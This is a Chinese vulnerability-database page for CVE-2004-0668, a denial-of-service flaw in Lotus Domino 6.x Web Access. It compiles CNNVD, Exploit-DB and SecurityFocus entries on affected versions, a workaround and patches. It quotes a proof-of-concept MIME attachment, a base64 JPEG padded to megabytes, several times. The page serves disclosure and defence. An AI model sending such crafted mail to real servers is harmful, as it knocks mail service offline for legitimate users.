CVE-2004-0668
CVSS5.0
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:47:30
NMCOES    

[原文]Web Access in Lotus Domino 6.5.1 allows remote attackers to cause a denial of service (server crash) via a large e-mail message, as demonstrated using a large image attachment.


[CNNVD]IBM Lotus Domino Server Web访问恶意邮件查看远程拒绝服务漏洞(CNNVD-200408-111)

        
        Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。
        IBM Lotus Domino服务器不正确处理部分恶意邮件,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        攻击者可以打开邮件程序,然后写一段如下消息发送给通过Domino Web Access读取邮件的用户:
        --- snip here; do not paste this line --
        Content-Disposition: Attachment; filename="PC210017.JPG"
        Content-Type: image/jpeg;
         Name="PC210017.JPG"
        Content-Transfer-Encoding: Base64
        /9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
        ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
        AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
        [Add here some megabytes of data. 1kB is not enough, but 12MB was
        sufficient in all my tests]
        --- snip here; do not pste this line ---
        这样当接收者在Domino Web Access中打开邮件时,可导致Domino服务器崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0668
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0668
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-111
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108871093704307&w=2
(UNKNOWN)  BUGTRAQ  20040630 DoS against Domino 6.5.1
http://www.securityfocus.com/bid/10641
(VENDOR_ADVISORY)  BID  10641
http://xforce.iss.net/xforce/xfdb/16596
(VENDOR_ADVISORY)  XF  lotus-domino-web-dos(16596)

- 漏洞信息

IBM Lotus Domino Server Web访问恶意邮件查看远程拒绝服务漏洞
中危 其他
2004-08-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。
        IBM Lotus Domino服务器不正确处理部分恶意邮件,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        攻击者可以打开邮件程序,然后写一段如下消息发送给通过Domino Web Access读取邮件的用户:
        --- snip here; do not paste this line --
        Content-Disposition: Attachment; filename="PC210017.JPG"
        Content-Type: image/jpeg;
         Name="PC210017.JPG"
        Content-Transfer-Encoding: Base64
        /9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
        ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
        AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
        [Add here some megabytes of data. 1kB is not enough, but 12MB was
        sufficient in all my tests]
        --- snip here; do not pste this line ---
        这样当接收者在Domino Web Access中打开邮件时,可导致Domino服务器崩溃。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 限制邮件最大字节数或者关闭web-access。
        厂商补丁:
        Lotus
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.lotus.com/home.nsf/welcome/domino

- 漏洞信息 (24243)

IBM Lotus Domino Server 6 Web Access Malicious Email View Remote Denial Of Service Vulnerability (EDBID:24243)
unix dos
2004-06-30 Verified
0 Andreas Klein
N/A [点击下载]
source: http://www.securityfocus.com/bid/10641/info

Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.

A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users. 

(just paste all the lines below into the body of the mail)
--- snip here; do not paste this line --
Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64

/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
--- snip here; do not pste this line --- 		

- 漏洞信息

7465
IBM Lotus Domino Web Access Message Handling DoS
Denial of Service
Loss of Availability

- 漏洞描述

- 时间线

2004-06-30 2004-02-16
2004-06-30 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, IBM has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IBM Lotus Domino Server Web Access Malicious Email View Remote Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 10641
Yes No
2004-06-30 12:00:00 2009-07-12 05:16:00
Discovery of this vulnerability is credited to Andreas Klein <Andreas.C.Klein@physik.uni-wuerzburg.de>.

- 受影响的程序版本

Lotus Domino 6.5.1
IBM Lotus Domino 6.5.2
IBM Lotus Domino 6.5.1
IBM Lotus Domino 6.5 .0
IBM Lotus Domino 6.0.3
IBM Lotus Domino 6.0.2 CF2
IBM Lotus Domino 6.0.2
IBM Lotus Domino 6.0.1
IBM Lotus Domino 6.0

- 漏洞讨论

Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.

A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.

- 漏洞利用

The following proof of concept is available:
(just paste all the lines below into the body of the mail)
--- snip here; do not paste this line --
Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64

/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
--- snip here; do not pste this line ---

- 解决方案

IBM has announced that fixes for this issue will be included in Lotus Domino 6.0.5 and 6.5.3 when these versions are released.

---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站